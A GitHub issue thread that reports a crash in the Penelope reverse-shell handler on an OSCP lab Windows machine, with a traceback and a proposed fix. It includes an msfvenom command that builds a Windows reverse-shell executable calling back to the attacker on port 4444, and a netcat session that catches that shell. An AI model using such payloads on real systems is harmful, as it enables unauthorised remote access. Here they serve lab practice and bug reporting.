brightio
Error catching msfvenom shell from a Windows host
Hi @brightio, thank you for your great tool. So far it has worked pretty well, but i encountered the following error.
When trying to catch some shells, penelope has an error and drops them. As you can see in the following excerpt, I had one session. Then a new connection comes in, but it causes an error (Oops... line). Afterwards I do not get a new session:
(Penelope)─(Session [4])> sessions
➤ CLIENTWK222-192.168.147.222-Microsoft_Windows_11_Pro-x64-based_PC
ID | Shell | User | Source
1 | Basic | clientwk222\diana | Connect(192.168.45.248:4444)
(Penelope)─(Session [4])>
Oops...🐞
────────────────────────────────────────────────────────────────────────────────
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1041, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3.13/threading.py", line 992, in run
self._target(*self._args, **self._kwargs)
~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/user/.local/share/pipx/venvs/penelope/bin/penelope.py", line 2016, in __init__
f"{paint(self.system + '-' + self.arch).cyan}"
~~~~~~~~~~~~^~~~~
TypeError: unsupported operand type(s) for +: 'NoneType' and 'str'
────────────────────────────────────────────────────────────────────────────────
Penelope version: 0.13.8
Python version: 3.13.2 (main, Mar 13 2025, 14:29:07) [GCC 14.2.0]
System: #1 SMP Kali 6.12.13-1kali1 (2025-02-11)
(Penelope)> sessions
➤ CLIENTWK222-192.168.147.222-Microsoft_Windows_11_Pro-x64-based_PC
ID | Shell | User | Source
1 | Basic | clientwk222\diana | Connect(192.168.45.248:4444)
Steps to reproduce
I generated a reverse shell with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 -v shellcode -f exe-service -o WindowsService1.exe
I executed the service exe on a Windows VM (OSCP lab machine). It creates a normal reverse shell, which for example works fine with regular netcat:
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.147.222] 60971
Microsoft Windows [Version 10.0.22000.978]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>
But when I use penelope to handle the shell it fails with the error from the top of my post. So far this only occurred with the msfvenom shell. Using the powershell payload that penelope generates, I can start a reverse shell on the same system.
Hi @six-two, many thanks for your bug report! I executed the same payload on a test machine and got a shell successfully. Could you please try to run it again but this time with -d switch on penelope and send me the output? Thank you
Hi @brightio,
the VM where the behavior occurred was part of the OSCP labs, which I sadly no longer have access to. If someone with access to the labs read this, I think it was one on the capstone lab VMs in chapter 17 (Windows PrivEsc).
I just the steps with my Windows 10 desktop, and like you I got a working shell from that. Maybe OffSec just had a really weirdly configured VM?
But as far as I see, changing the line from string concatenation to format strings (something like str(paint(f"{self.system}-{self.arch}").cyan) should at least fix the error I got without negative side effects. Though I am not sure if the weird system/shell would cause errors somewhere else too.
Penelope relies on the systeminfo command to retrieve session details, but if I remember well, that this command was disabled on one of the OSCP machines. I will address this bug shortly. Thank you very much for reporting it!!